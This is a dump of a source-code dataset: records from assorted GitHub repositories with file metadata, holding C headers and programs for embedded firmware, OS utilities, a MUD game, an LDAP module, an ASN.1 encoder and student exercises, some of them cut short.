#ifndef TransFloor_h
#define TransFloor_h
#include "ofMain.h"
#include "ofxOsc.h"
#include "ofxJSON.h"
#include "ofxSimpleTimer.h"
#include "KinectCV.h"
#include "Base.h"
#include "Blank.h"
#include "WhiteOut.h"
#include "tk... | [
"yoshitaka_12@iamas.ac.jp"
] | yoshitaka_12@iamas.ac.jp |
f8aac0e7d1d28e9c44674e2e64d83a615012e603 | 0d4cf09f8cbaf9308c6f141659678f3b707cc432 | /libopencm3/include/libopencm3/sam/common/periph_common_3a3x.h | a0dcae238d1ae100a3794beb58ce46dee54eb4ae | [
"GPL-3.0-only",
"LGPL-3.0-only",
"LGPL-3.0-or-later",
"MIT",
"LGPL-2.1-or-later",
"LGPL-2.0-or-later"
] | permissive | abhra0897/stm32f1_ili9341_parallel | 2ed3611efd8ae0bfe6d7834b072df12598eab3f0 | 78cba0545b563da071e99b83d90af8497a568ca5 | refs/heads/master | 2023-02-03T13:53:24.103288 | 2020-12-08T15:18:08 | 2020-12-08T15:18:08 | 266,373,542 | 7 | 7 | MIT | 2020-10-05T06:42:10 | 2020-05-23T16:16:36 | C | UTF-8 | C | false | false | 2,014 | h | /*
* This file is part of the libopencm3 project.
*
* Copyright (C) 2015 Felix Held <felix-libopencm3@felixheld.de>
*
* This library is free software: you can redistribute it and/or modify
* it under the terms of the GNU Lesser General Public License as published by
* the Free Software Foundation, either version... | [
"abhra0897@gmail.com"
] | abhra0897@gmail.com |
0b8d40a684f431b71fe789b00360125be90a1038 | acb8d4c4f974d872f31997f591fea4d748f94b93 | /d/taihu/obj/xiangcha.c | 5a5408f129ec7c8927cb4e6b70951a2d90e71b7a | [] | no_license | MudRen/SZMUD | 8ae6b05718b1a83363478469185e0d776b0fda5c | e3b46e6efa6d353f7f0d00ef676f97d5c0ec3949 | refs/heads/master | 2023-05-27T16:04:35.845610 | 2021-06-18T12:47:19 | 2021-06-18T12:47:19 | 361,736,744 | 1 | 2 | null | null | null | null | GB18030 | C | false | false | 2,101 | c | // Code of ShenZhou
// xiangcha.c 香茶
// By Marz 03/29/96
inherit ITEM;
void init();
void do_eat();
void create()
{
set_name("香茶",({"tea", "cha", "xiang cha"}));
set_weight(50);
if (clonep())
set_default_object(__FILE__);
else {
set("long", "一杯热茶,悠悠地冒着香气~~~\n");
set("unit", "杯");
set("value", 300);
... | [
"i@oiuv.cn"
] | i@oiuv.cn |
2e68b2d4b63d43aa7b66df383f5545564fcdf5eb | 5ccaeb278ef69bf41d803f9bf339101c39bf2136 | /apps/examples/system/debug_usb_cdc_2/firmware/src/system_config/pic32mz_ef_sk/system_definitions.h | 434abfcb17510459d089b2946d33366ff27ee4b1 | [] | no_license | Mytrex/Harmony | 6de69d5ebbb8cb7769a9ee7bd0330264c1d6ed3a | 32dceb018139e59a12c26044b9f0252d1c0d67c9 | refs/heads/master | 2021-03-16T09:42:26.915713 | 2016-11-02T08:25:20 | 2016-11-02T08:25:20 | 71,403,438 | 0 | 1 | null | null | null | null | UTF-8 | C | false | false | 4,576 | h | /*******************************************************************************
System Definitions
File Name:
system_definitions.h
Summary:
MPLAB Harmony project system definitions.
Description:
This file contains the system-wide prototypes and definitions for an MPLAB
Harmony project.
****... | [
"jared@mytrexinc.com"
] | jared@mytrexinc.com |
0a3629518eb1a9e55d4651e52829d19df1c0d5b0 | 2f6d67c53ba3758c36d331fd1980ef96cd31afb7 | /HelenOS/uspace/app/devctl/devctl.c | 0bf5781b4a4b2eec73885b30c0bf637613b51956 | [
"Apache-2.0"
] | permissive | bhanug/HelenOS | 8590d22b176c525deb81d7c1fc0df10e7bfbac37 | 037c54f7a155269d88a5e5b2c8bcfa736d63d979 | refs/heads/master | 2021-01-01T18:31:16.709203 | 2017-04-13T20:12:29 | 2017-04-13T20:12:29 | null | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 8,445 | c | /*
* Copyright (c) 2011 Jiri Svoboda
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
*
* - Redistributions of source code must retain the above copyright
* notice, this list of condit... | [
"ayyucedemirbas@windowslive.com"
] | ayyucedemirbas@windowslive.com |
16299089552da80211f4e0319e141792a0294bdf | bd111f77d5d2f988eb17ff20b588439f6caf5984 | /apps/pic32mz_ef_curiosity_v2/snake_game/firmware/src/config/default/gfx/legato/string/legato_stringutils.h | 75ed604ff3092c7734c009e10deae40f6419648c | [
"ISC",
"LicenseRef-scancode-public-domain",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | SyedThaseemuddin/MPLAB-Harmony-Reference-Apps | d10e472b9504bdadbae77552ba16007bd897e75a | 16e4da0b1d071a9c1f454697b275a2577c70a0aa | refs/heads/main | 2022-07-28T17:43:06.953592 | 2021-01-28T01:53:21 | 2021-01-28T01:53:21 | 300,107,782 | 0 | 0 | NOASSERTION | 2020-10-01T01:52:13 | 2020-10-01T01:37:31 | null | UTF-8 | C | false | false | 18,464 | h | /*******************************************************************************
* Copyright (C) 2020 Microchip Technology Inc. and its subsidiaries.
*
* Subject to your compliance with these terms, you may use Microchip software
* and any derivatives exclusively with Microchip products. It is your
* responsibility to ... | [
"syed.thaseemuddin@microchip.com"
] | syed.thaseemuddin@microchip.com |
9ba21281f50f78852c3bb97d4954b010d09316fb | 919a732592a070878017021eee890ac412077be4 | /leetcode/find-all-duplicates-in-an-array.h | 07f895da48db15d2718edd8098930c2298c37460 | [] | no_license | abdallahmahran10/programming_problems | 77adb7e928bc8925de158e0109e86a79c4d863ae | 3a3dcf564ae8c9b771314be12c472e2f66d6a95a | refs/heads/master | 2020-05-21T23:59:52.101382 | 2019-03-12T04:13:40 | 2019-03-12T04:14:58 | 59,847,809 | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 465 | h | /*
Author: Abdallah Mahran
Ref: https://leetcode.com/problems/find-all-duplicates-in-an-array/
Date: 1/23/2017
*/
// Functions
vector<int> findDuplicates(vector<int>& nums) {
vector<int> res;
if (nums.empty())
return res;
for (int i = 0; i < nums.size(); i++)
nums[abs(nums[i]) - 1] *= -1;
//
for (int i = ... | [
"noreply@github.com"
] | abdallahmahran10.noreply@github.com |
75bfabc79415da1a8a24dc99e95cab1cb34ae0c5 | 4ab89ae8edac856f929148097e4f2c9283dc493e | /0x02-functions_nested_loops/100-times_table.c | f065db67aa26c692e467a09f7724692427e6b965 | [] | no_license | j-tyler/holbertonschool-low_level_programming | aa71201837327f4eed5a801647a11c73d2f56bc2 | d23ad545a5566489a946b7729dc9232fd44d9cb1 | refs/heads/master | 2021-01-11T01:17:23.988289 | 2017-03-31T23:00:43 | 2017-03-31T23:00:43 | 70,729,011 | 1 | 1 | null | null | null | null | UTF-8 | C | false | false | 728 | c | #include "holberton.h"
/**
* print_times_table - print out a times table to argument
* @n: the size of table to print to, max 15
*
* Return: nothign
*/
void print_times_table(int n)
{
int i, j, k;
if (n < 0 || n > 15)
;
else
{
for (i = 0; i <= n; i++)
{
_putchar('0');
for (j = 1; j <= n; j++)
... | [
"justin.marsh@holbertonschool.com"
] | justin.marsh@holbertonschool.com |
a9f5ce7c80afd54e8d7c554064472401cb03f785 | 7865a9ac2ea0a851ac6a6becf53cd20c9837d2e9 | /WStudio/L7subscriber/subscriber.c | b2774db9a8f32a539fb304cfb0320db37ac7747b | [] | no_license | iotexpert/MouserVTW-10-24 | cfaa4a6a0316b7e624fadc7fbb66b97e77881bfa | f7b6001147c07239a61e88f71c35b2acad0d7c5e | refs/heads/master | 2020-04-01T14:11:06.031242 | 2018-10-23T17:42:11 | 2018-10-23T17:42:11 | 153,284,082 | 0 | 1 | null | null | null | null | UTF-8 | C | false | false | 14,231 | c | /*
* Copyright 2018, Cypress Semiconductor Corporation or a subsidiary of
* Cypress Semiconductor Corporation. All Rights Reserved.
*
* This software, associated documentation and materials ("Software"),
* is owned by Cypress Semiconductor Corporation
* or one of its subsidiaries ("Cypress") and is protec... | [
"arh@Alans-MacBook-Pro-565184.local"
] | arh@Alans-MacBook-Pro-565184.local |
ec4f209dd47cafe147827012d861fd9df64b003b | a1c7170e47ce3218b1e456562b0e4f18afae9dd8 | /Chapter 12/5.c | c372511a080761a58d7af8987c7d8e49064e78fd | [] | no_license | DoDoBooM/C-Primer-Plus-Practices | 7138089f830c5a481bb4e4980ef7d319c7346365 | f75159da06bcf719712ba1360a205a314c870dad | refs/heads/master | 2020-06-22T01:33:13.797940 | 2019-11-27T16:22:22 | 2019-11-27T16:22:22 | 197,600,463 | 1 | 0 | null | null | null | null | UTF-8 | C | false | false | 697 | c | #include <stdio.h>
#include <stdlib.h>
#include <time.h>
#define LEN 100
int GetRandNumber();
void SelectionSort(int[]);
int main(int argc, char* argv[])
{
srand((unsigned int)time(0));
int arr[LEN];
printf("index\t\tvalue\n");
for (int i = 0; i < LEN; ++i)
{
arr[i] = GetRandNumber();
}
SelectionSort(arr);
f... | [
"1059125162@qq.com"
] | 1059125162@qq.com |
c98242fb9835e425ca66e57cbe30583058914eb5 | 0e1ba7914d71ddc17b7f332ebfaeebf803e9fd21 | /opencl_benchmark.c | 3aede35fcf1ad03f14c78e69e1ba371ae5454da7 | [] | no_license | tobyhinloopen/C-RTS | f325b9660146a3b388d7eea64b956ae713bc8c4a | a9523c4d95439468db1597b0eb4f2b2debbf3906 | refs/heads/master | 2021-01-14T08:03:12.671922 | 2020-01-04T16:59:23 | 2020-01-04T16:59:23 | 52,998,595 | 1 | 0 | null | null | null | null | UTF-8 | C | false | false | 7,374 | c | #include "opencl_benchmark.h"
#include <assert.h>
#include <stdio.h>
#include "file.h"
#include <math.h>
#include "rand_range.h"
#include <time.h>
#include <float.h>
#define UNIT_COUNT 0xFFFF
#define VERIFY_RESULT 0
static cl_float2 units[UNIT_COUNT];
static int unit_team_ids[UNIT_COUNT];
static cl_float3 closest_ene... | [
"toby@zisoo.nl"
] | toby@zisoo.nl |
0f20bebbe73e76d2ab4425e8f8cc584ef4e7e784 | 941bde2bc914ae445f13a1d03ae01114745e6f05 | /Ubiquitous/XiUOS/kernel/include/xs_kdbg.h | dcb75cee8f78dd2df0784a6b320104e2baf10c34 | [
"LicenseRef-scancode-mulanpsl-2.0-en"
] | permissive | caodg/xiuos | ab6125eeb939e2b2435e72cb4e00d94ceabe3eec | 0ddb5bfd1f2d80ec762bd2627d04c60da063e9fc | refs/heads/master | 2023-06-18T03:56:26.108518 | 2021-06-16T01:46:00 | 2021-06-16T01:46:00 | 387,332,442 | 1 | 0 | null | null | null | null | UTF-8 | C | false | false | 6,187 | h | /*
* Copyright (c) 2020 AIIT XUOS Lab
* XiUOS is licensed under Mulan PSL v2.
* You can use this software according to the terms and conditions of the Mulan PSL v2.
* You may obtain a copy of Mulan PSL v2 at:
* http://license.coscl.org.cn/MulanPSL2
* THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANT... | [
"xuetest@163.com"
] | xuetest@163.com |
251abcbcd34376ab4f8de345a0d2f5c8e1b51334 | a21addc885aa9890d019b0dc4380a3067f591529 | /src/vflash.c | 04f54bcce5d9f0992e0782bd866d76e78e4c268b | [] | no_license | yunshengtw/vst | 8ec1aebc42aa5597f342d3038cd0534eadc70a5a | 118fefeaffc1ac152b102192ac6bcfd2b23e109a | refs/heads/master | 2020-04-11T11:10:13.469838 | 2018-12-14T06:35:39 | 2018-12-14T06:35:39 | 161,740,126 | 2 | 0 | null | null | null | null | UTF-8 | C | false | false | 3,324 | c | /**
* vflash.c
* Authors: Yun-Sheng Chang
*/
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <assert.h>
#include "config.h"
#include "vflash.h"
#include "vram.h"
#include "vpage.h"
#include "logger.h"
#include "checker.h"
#include "stat.h"
#define VST_UNKNOWN_CONTENT ((uint... | [
"jiungsen@gmail.com"
] | jiungsen@gmail.com |
89d4779c17bb66b0e23a2d73bcafcc9d1fe22b71 | 1956ce04cec5e30dbfc5fd4444b330d9e4440354 | /freertos/freertos_f411_idlehook/Core/Src/stm32f4xx_hal_timebase_tim.c | 593fc179b4974dd623763212bdad6e8a8080bb47 | [] | no_license | har-in-air/STM32_CODE_EXAMPLES | 34fdeade6708559b8c45a7d38828fa13ff971d93 | 9b6b11a1db665d84bbe7695d7c0bd3e4f6eb6b48 | refs/heads/master | 2023-08-10T17:08:35.107204 | 2021-09-10T10:19:45 | 2021-09-10T10:19:45 | 272,433,105 | 14 | 5 | null | null | null | null | UTF-8 | C | false | false | 4,075 | c | /* USER CODE BEGIN Header */
/**
******************************************************************************
* @file stm32f4xx_hal_timebase_TIM.c
* @brief HAL time base based on the hardware TIM.
******************************************************************************
* @attention
*
... | [
"harinnair@yahoo.com"
] | harinnair@yahoo.com |
e6a6f2680c09963ad18ad2c9e597d40a9c723e4f | 7b7a379ca47e527e7bb3ca91a7228c32a53cf4d7 | /2016_WS/Parallel_Programming/lecture_code/11.MPI1-code/2-write-files.c | 8fecc064f352fa1813e4f77150046f9d2269ba25 | [] | no_license | Doenerman/Master | 10c7220599e59537da49007d77b4ff26b9b7da28 | c0c135b47ab04ee65e2ad8bca5b3b1dcbc10226b | refs/heads/master | 2021-01-10T18:06:58.035498 | 2018-07-31T14:16:04 | 2018-07-31T14:16:04 | 45,683,382 | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 714 | c | #include <stdio.h>
#include <stdlib.h>
#include <mpi.h>
#include <string.h>
int main( int argc, char *argv[] )
{
int rank, nProcs;
MPI_Init(&argc,&argv);
MPI_Comm_rank( MPI_COMM_WORLD, &rank );
MPI_Comm_size( MPI_COMM_WORLD, &nProcs );
// printf("I am process %d (%d)\n", rank, nProcs);
char fi... | [
"jan.uthoff@rwth-aachen.de"
] | jan.uthoff@rwth-aachen.de |
d39267f7bbf321cb8db95d33054535050536fdc6 | e3afeab04cfed95b18affeb766bdffec6c610ab3 | /src/model_fromSep03/m2query.c | 0eb1f07a00d25860a68425ef1c5333bd3d713eca | [] | no_license | VB6Hobbyst7/NCL_in_VisualStudio | 2831e101163d34be5b5775c458471313cd6c035b | 998a5a4ca9eb1cfdee0b276ae9541f7d1f7e6371 | refs/heads/master | 2023-06-24T12:03:34.428725 | 2021-07-27T20:30:46 | 2021-07-27T20:30:46 | null | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 63,079 | c | /********************************************************************r
** NAME: m2query.c
** CONTAINS:
** um_query()
** um_point_query()
** um_line_query()
** um_vector_query()
** um_pntvec_query()
** um_matrix_query()
** um_circle_query()
** um_c... | [
"asoiguine@nccs.com"
] | asoiguine@nccs.com |
5c2fe76f055261c573374c1cdf2edf2086f1e371 | 421733d61d2155012a5ade1685fb9803597e2507 | /78.c | 4922e1b960b05c1826a163216afb93a68c4f98a0 | [] | no_license | AKHILASANTHOSH/cutee | 1b8b3da1c9a5d853aa26ff45f0a72f70c235f82d | 2e363aef9495a72f0ad3b5faf29d6e71880da8ba | refs/heads/master | 2021-01-01T19:57:29.687964 | 2018-02-05T11:23:37 | 2018-02-05T11:23:37 | 98,727,594 | 0 | 1 | null | null | null | null | UTF-8 | C | false | false | 206 | c | #include<stdio.h>
int main()
{
int n;
printf("enter the number:");
scanf("%d",&n);
if(n%13==0)
{
printf("the number is divisible by 13");
}
else
{
printf("the number is not divisible by 13");
}
return 0;
}
| [
"noreply@github.com"
] | AKHILASANTHOSH.noreply@github.com |
d097320df2f59d4514d0bc166398287df738fd10 | fa24a14734ea922c3c67e8bcb8951ecbfae1a7a8 | /src/apm_ompi.c | eea623833128c8ddb2d450bcabdf91d170dd2ecd | [] | no_license | riadeb/pattern-matching | 3ba997eb8c735d95cb100d3d9811f0c3a5b97228 | 963dd9b23b1695263edbb6aa385f2c4bdc78deee | refs/heads/main | 2023-03-22T02:11:51.608438 | 2021-03-15T21:35:25 | 2021-03-15T21:35:25 | 340,908,869 | 0 | 1 | null | null | null | null | UTF-8 | C | false | false | 8,329 | c | /**
* APPROXIMATE PATTERN MATCHING
*
* INF560
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/time.h>
#include <mpi.h>
#include <omp.h>
#define APM_DEBUG 0
char *
read_input_file( char * filename, int * size )
{
char * buf ;
off_t fsize;
... | [
"riade.benbaki@allemagne.polytechnique.fr"
] | riade.benbaki@allemagne.polytechnique.fr |
41a4ea1400aa24c819f96169107028596ee839a4 | 17befabc8cded17f907beb78a587f7f52c1f9258 | /piscine_reloaded/ex17/ft_strcmp.c | c8c5fef965f372feb05b1bc13e43dda214fd2e2d | [] | no_license | kmoilane/Hive-Helsinki | d53859441a6dbd24faa863ef883b7c9da5e94492 | a3298d550a2632f3456392396c9c12183c2e968a | refs/heads/master | 2022-11-06T01:08:07.107659 | 2022-10-14T18:24:44 | 2022-10-14T18:24:44 | 229,093,024 | 0 | 0 | null | 2021-03-23T08:49:16 | 2019-12-19T16:16:17 | C | UTF-8 | C | false | false | 1,037 | c | /* ************************************************************************** */
/* */
/* ::: :::::::: */
/* ft_strcmp.c :+: :+: :+: ... | [
"kmoilane@c1r1p11.hive.fi"
] | kmoilane@c1r1p11.hive.fi |
6aeec71264b3cc636f1a1e53619de599160cee30 | 29e3a831167dd6f80a20e5f9541738adc25e71d1 | /bta/dm/bta_dm_cfg.c | 6228b068aff3960f122f40568529109af8451ffa | [] | no_license | likai1113/bluedroid | 07834ac31d3da03affd91839ecbc60db4929a4e4 | 220ac80aa8e0fe998763e89b2bf82deb5e07fc99 | refs/heads/master | 2021-08-01T20:29:36.571143 | 2015-05-25T01:50:42 | 2015-05-25T01:50:42 | null | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 22,476 | c | /******************************************************************************
*
* Copyright (C) 2003-2012 Broadcom Corporation
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at:
*
... | [
"likai@youku.com"
] | likai@youku.com |
74d5a00b0d63bfea85f216e984d6ebc4c083e1ef | a886d81e50cb024c44484126a78662038d4957a6 | /0x10-variadic_functions/0-sum_them_all.c | fd875e42a649bbeb15924e81b4330443cfb75680 | [] | no_license | urwithinrange/holbertonschool-low_level_programming | 11c7c0a512e717fd0b5049bb172e0fd4f9ac167c | cbdf6e3e1609f23d1e07bc9c27dfdface15a4c3c | refs/heads/main | 2023-08-14T03:48:14.795115 | 2021-09-20T07:26:58 | 2021-09-20T07:26:58 | 296,107,833 | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 411 | c | #include "variadic_functions.h"
/**
*sum_them_all - returns the sum of all parameters
*@n: the number of ints being passed
*
*Return: the sum of all parameters
*/
int sum_them_all(const unsigned int n, ...)
{
va_list ap; /*argument promotion*/
size_t i, sum;
if (n == 0)
return (0);
va_start(ap, n);
su... | [
"urwithinrange@yahoo.com"
] | urwithinrange@yahoo.com |
b60c32b44fa7317260ef52dbd031bfbcb8fb7c1f | 4a59d5bdba6a5d56f2df9cbfe129298076b7bea0 | /asn1c/UEAggregateMaximumBitrate.c | cc3f912713d809ffd4570f6750ca0becb1669207 | [] | no_license | polalgen/asn1-go | 3f884d7e1bb688090c94b3085b212f6c0f9e65fe | f80a6be173dc11ce68c8d36db92efd50eec1df3b | refs/heads/main | 2023-09-05T03:08:51.406477 | 2021-11-16T12:01:16 | 2021-11-16T12:01:16 | 428,327,649 | 2 | 0 | null | null | null | null | UTF-8 | C | false | false | 2,882 | c | /*
* Generated by asn1c-1.0.0 (http://lionet.info/asn1c)
* From ASN.1 module "S1AP-IEs"
* found in "../asn1/S1AP-IEs.asn"
* `asn1c -gen-PER -fcompound-names -S ../skeletons`
*/
#include "UEAggregateMaximumBitrate.h"
static asn_TYPE_member_t asn_MBR_UEAggregateMaximumBitrate_1[] = {
{ ATF_NOFLAGS, 0, offsetof(... | [
"polalgen@yandex.ru"
] | polalgen@yandex.ru |
98b0e1de6f09d87b4f237a9b7ad5993bb5fd004a | a9d15aa7ba2bc1b9ae7edfd54ee49c9b3cf8a4c4 | /archive/benchmarksv3/tealeaf-parallel/c_kernels/openacc/local_halos.c | 22c673e49ff01344f970f91fd84cd0747998f21f | [
"MIT"
] | permissive | tallendev/uvm-eval | d712bb7b152b1bbc34d08e66d4bd0a412d3ac58b | 6ae77eb71c902f5bf6f16ae0fce148f18627d9c1 | refs/heads/master | 2023-09-06T05:30:00.101667 | 2023-08-30T17:21:10 | 2023-08-30T17:21:10 | 356,388,244 | 13 | 2 | null | null | null | null | UTF-8 | C | false | false | 4,308 | c | #include <stdlib.h>
#include "../../shared.h"
/*
* LOCAL HALOS KERNEL
*/
void update_left(
const int x, const int y, const int halo_depth, const int depth,
double* buffer, bool is_offload);
void update_right(
const int x, const int y, const int halo_depth, const int depth,
doubl... | [
"tnallen@g.clemson.edu"
] | tnallen@g.clemson.edu |
7b12b780af7b4f454b001f0ebfd35da329db9400 | c19dcfcf0cb73499f7aaa435d101336b9d2f7b2e | /WholeMusic-iOS/WholeMusic/Pods/Headers/Public/TestSDK1/MASUtilities.h | 44dd425688ef6967b9bfa19571425c807a309f86 | [
"Apache-2.0"
] | permissive | hssdx/sdk-crash | 3b321774dbf57bfba94fd18eb66872072b4ce107 | 678847765e59cab048c5f8f9d075ce721ef9c63b | refs/heads/master | 2023-04-06T10:10:20.636562 | 2019-06-10T08:25:53 | 2019-06-10T08:25:53 | 182,992,786 | 1 | 0 | null | null | null | null | UTF-8 | C | false | false | 53 | h | ../../../../../../TestSDK1/src/Masonry/MASUtilities.h | [
"xiongxunquan@bytedance.com"
] | xiongxunquan@bytedance.com |
7d90e31840b802f2a605a27882a4eabebd463d01 | 701036684243479984a5a00ca720f6c20cdbaf54 | /Cache_Files/cache.c | 7fa5e861c3d49d996302755dfdb0d0065284ed1d | [] | no_license | bornhorst/CacheSimulator | 19894618ef02237f05d83fe9b889234d782caa94 | 27854edd985cb405cdad22452f2f1851cbc32bcd | refs/heads/master | 2020-06-07T09:32:58.045605 | 2019-06-20T21:21:46 | 2019-06-20T21:21:46 | 192,988,765 | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 3,885 | c |
/* place cache functions in here */
/* # includes */
#include "cache.h"
/* cache functions */
/*
* Initialize All Cache Parameters
* to Zero on Reboot
*
*/
int cache_startup
(
struct cache_set* s_cache,
int tot_sets,
int tot_ways
)
{
for(int i = 0; i < tot_sets; i++)
{
for(int j = 0; j < tot_ways; j++)
{... | [
"bornhor2@augusta.cs.pdx.edu"
] | bornhor2@augusta.cs.pdx.edu |
4fdfa8fc2e38f80501254111e0852c5dc923138c | f4a80bb02640cc34a7f4a7298025f032aaeafffa | /opendps/past.c | 7c42690fa2f64bf540911ab2eb14eb6c827fe85b | [
"MIT"
] | permissive | jimmyw/opendps | 46d15f43b55b38e111fec5d9930f91b6fa82a5bf | 64361e3fcfeef6e90a434969ffe5d9c871ac596d | refs/heads/master | 2020-03-27T19:57:16.415175 | 2018-09-02T17:16:57 | 2018-09-02T17:16:57 | 147,024,411 | 1 | 0 | MIT | 2018-09-01T18:53:44 | 2018-09-01T18:53:44 | null | UTF-8 | C | false | false | 19,841 | c | /*
* The MIT License (MIT)
*
* Copyright (c) 2017 Johan Kanflo (github.com/kanflo)
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation t... | [
"johan.kanflo@bitfuse.net"
] | johan.kanflo@bitfuse.net |
a695dfc6c8d71d5fb61171953e408cd7c8794386 | 1e0128f7dc41917388f1f682401955b92de051a0 | /src/vdecoder/include/vdecoder_config.h | 07ee81d38fd56d95041b09927f30648948079608 | [] | no_license | bambooHaw/CedarX-12.06.2015 | 7f96d7b9a50f626235de1bd82fbd354fd5fdf769 | 1f73f8e65087d1368b3bc7528533cea21cb386dd | refs/heads/master | 2020-04-16T19:05:34.758675 | 2019-01-16T08:41:08 | 2019-01-16T08:41:08 | 165,846,554 | 0 | 1 | null | null | null | null | UTF-8 | C | false | false | 1,096 | h | /*
* Cedarx framework.
* Copyright (c) 2008-2015 Allwinner Technology Co. Ltd.
* Copyright (c) 2014 BZ Chen <bzchen@allwinnertech.com>
*
* This file is part of Cedarx.
*
* Cedarx is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published... | [
"haoxiansen@zhitongits.com.cn"
] | haoxiansen@zhitongits.com.cn |
7078a734703c5d84f309f658dc59ed295b9fcc88 | 0543ff7356c73cfcd962d9691014a9aab88c4132 | /matrice.c | d8d1e002bd726c4c84e0788ef1151f46f5e154a4 | [] | no_license | Fatima-Usf/Implementation-d-un-system-lineaire-v2 | ca3448ec8519d805c83806124ee1a6e3bf37f417 | 23fa5047523afd60aeced1df1c6dcf21fcdcadc8 | refs/heads/master | 2021-06-11T16:18:04.578094 | 2017-01-04T01:08:25 | 2017-01-04T01:08:25 | 77,966,923 | 1 | 0 | null | null | null | null | UTF-8 | C | false | false | 4,257 | c | #include <stdio.h>
#include <stdlib.h>
#include <math.h>
float * * AllocationDynamique ( int ligne , int colone )
{
//il pointe sur colone et ligne
float * * ptr = ( float * * ) malloc ( sizeof ( float * ) * ligne + sizeof ( float ) * colone * ligne ) ;
float * ptr2 = ( float * ) ( ptr + ligne ) ;
int ... | [
"noreply@github.com"
] | Fatima-Usf.noreply@github.com |
ee169a0a25610a133ac6329af009c33041c6fb20 | 5041effa4d002e70463cb5903dfc6ae524c1bf5b | /Hierarchy_files/writeToSD.c | f1014b43ab82562fd772d820ec91049923f38d9a | [] | no_license | expensivecow/Music-Synthesizer | 04a4520ed4eac3883122f1b68b41bf51c532c681 | 88e64a1c0fa3d132f0251e8937c5c7bd2ba2f965 | refs/heads/master | 2021-01-22T21:17:05.208149 | 2015-02-12T16:11:00 | 2015-02-12T16:11:00 | 29,541,282 | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 2,968 | c | #include <stdio.h>
#include <stdlib.h>
#include "altera_up_sd_card_avalon_interface.h"
#include <sys/alt_irq.h>
short int write_file = 0;
// \r is carriage return, \r\n is new line in windows \0 is the null value for end of string
int buffer[100][13];
int timer[100];
char key;
void write_sd(char *desiredfile)
{
in... | [
"poppop208@gmail.com"
] | poppop208@gmail.com |
449b13d849138fa73297151799bccb011705cafe | 7633aa2aeb78a87c0e2beb2df5c5df214b4c060c | /concurrency-bugs/apache-45605/httpd-2.2.9/modules/ldap/util_ldap.c | 5ea50d0a6c8bd68c5dce050c7e49218f066929d0 | [
"Apache-2.0",
"LicenseRef-scancode-pcre",
"LicenseRef-scancode-unknown-license-reference",
"LicenseRef-scancode-public-domain",
"LicenseRef-scancode-rsa-md4",
"HPND-sell-variant",
"metamail",
"LicenseRef-scancode-rsa-1990",
"LicenseRef-scancode-zeusbench",
"Beerware",
"Spencer-94",
"MIT",
"B... | permissive | tingting703/ConTesa | 274ee4bd912586afffa2b76ce0364e21917a5662 | 1ca3fbac262c5ce5364066425028545f0432db40 | refs/heads/master | 2020-03-19T10:34:09.202919 | 2018-06-07T21:58:16 | 2018-06-07T21:58:16 | 136,383,008 | 1 | 0 | null | null | null | null | UTF-8 | C | false | false | 71,969 | c | /* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not... | [
"tingting703@gmail.com"
] | tingting703@gmail.com |
ab1eff3d76a76578deee0f78cf56d32e3df6d757 | f55068697ba56ee5ba04becd3957289118001f95 | /Engine/libsndfile/src/au.h | d56b439d3d664232699f19fa9fca2ce536e64eff | [] | no_license | kom2002/TAB_Converter_x64 | 2c364bc7b4b7f0396bb0de34cad9c09d0db1a992 | 4b143f00bdf53be99ced3113c0fa63a1b91ee0d1 | refs/heads/master | 2016-09-08T01:37:49.215066 | 2012-10-21T06:49:42 | 2012-10-21T06:49:42 | null | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 1,326 | h | /*
** Copyright (C) 1999-2004 Erik de Castro Lopo <erikd@mega-nerd.com>
**
** This program is free software; you can redistribute it and/or modify
** it under the terms of the GNU Lesser General Public License as published by
** the Free Software Foundation; either version 2.1 of the License, or
** (at your opt... | [
"kom2002@yahoo.com"
] | kom2002@yahoo.com |
b0a074601ef0718dff9e6ae7b8062feaa6901e6e | 05ac036aaf2f3b3dca247974482e8277ae9abdad | /ex9-os1-2011/ex9_server_routines.c | a79ac2c082c17d41450b2c5972b389397e20d11e | [] | no_license | AndreyShamis/opos1 | 76504de13ea0d3b6e7da7301f0ac557f61a5c9dc | 9a5f549ebc6b367b905350f90ca9b8e4ffab84c6 | refs/heads/master | 2016-09-16T01:31:49.551090 | 2011-01-21T16:13:19 | 2011-01-21T16:13:19 | 32,789,923 | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 3,693 | c | /*
* Provide tools which can get options to check some string which posible be
id, and can be checked if this id is correct id.
If the ID is correct the checking function return 1 and if its not correct id
the function return 0. Correct id must include 9 digits.
* Another function which provide server its math... | [
"lolnik@gmail.com@4de3f0e1-184e-52b5-56bf-05c33a74d31c"
] | lolnik@gmail.com@4de3f0e1-184e-52b5-56bf-05c33a74d31c |
b2eb39b0678db5d7b5e3677a62ae9b38d0f56aa8 | ab4c6ab6b546067f4aadf5219d2e3932188ef2ac | /chap9/p3.c | 59476fcf3c4aeb28e0e388be6d89e197f415557d | [] | no_license | younggyoseo/knk-c-programming | 3d480753d56ee462f5fb2b844da5a59c9da59cd1 | 05c0b3473d246f87c663539cc964e0c7ceacc097 | refs/heads/master | 2021-09-15T03:25:03.723125 | 2018-05-25T07:30:34 | 2018-05-25T07:30:34 | null | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 1,908 | c | #include <stdio.h>
#include <stdlib.h>
#include <time.h>
